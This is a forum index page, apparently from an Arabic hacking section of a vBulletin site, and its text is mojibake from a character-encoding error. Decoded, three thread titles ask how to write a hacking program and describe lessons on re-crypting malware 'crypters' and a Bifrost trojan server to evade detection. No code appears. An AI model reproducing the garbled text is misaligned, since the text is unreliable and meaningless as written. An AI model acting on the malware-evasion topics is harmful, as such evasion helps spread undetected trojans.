[ ØáÈ ] ßíÝíÉ ÈÑãÌÉ ÈÑäÇãÌ ÅÎÊÑÇÞ ÈÎæÇÕ ÑåíÈÉ ÈÇáÏáÝí Ãæ ÇáÏæÊ äÊ þwindows 8 ÇáÃÑÔíÝ 0 11-06-2012 10:10 PM
ÔÑÍ áØÑíÞÉ ÇÚÇÏÉ ÊÔÝíÑ ÈÑÇãÌ ÇáÊÔÝíÑ ÈÃÍÊÑÇÝíÉ ÊÇãÉ,ÔÑÍ ØÑíÞÉ ÇÚÇÏÉ ÊÔÝíÑ ÈÑÇãÌ ÇáÊÔÝíÑ ßáãÇ ÇäßÔÝÊ þwindows 8 ÇáÃÑÔíÝ 0 11-05-2012 01:42 AM
[ ÔÑÍ ] ÇáÏÑÓ ÇáËÇáË Ýì ÏæÑÉ ÇáÊÔÝíÑ ÈÇáÝÌæá ÊÔÝíÑ ÓíÑÝÑ ÈíÝÑæÓÊ ÈØÑíÞÉ ÌÏíÏÉ æÇáÇÓÊÛäÇÁ Úä ÕÇäÚ ÇáÓ aaqassam ÞÓã ÅÎÊÑÇÞ ÇáÃÌÜåÜÒå æÇáÃíÜãÜíÜáÇÊ 0 11-01-2012 10:33 PM


ÇáÓÇÚÉ ÇáÂä 06:44 PM

 



Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point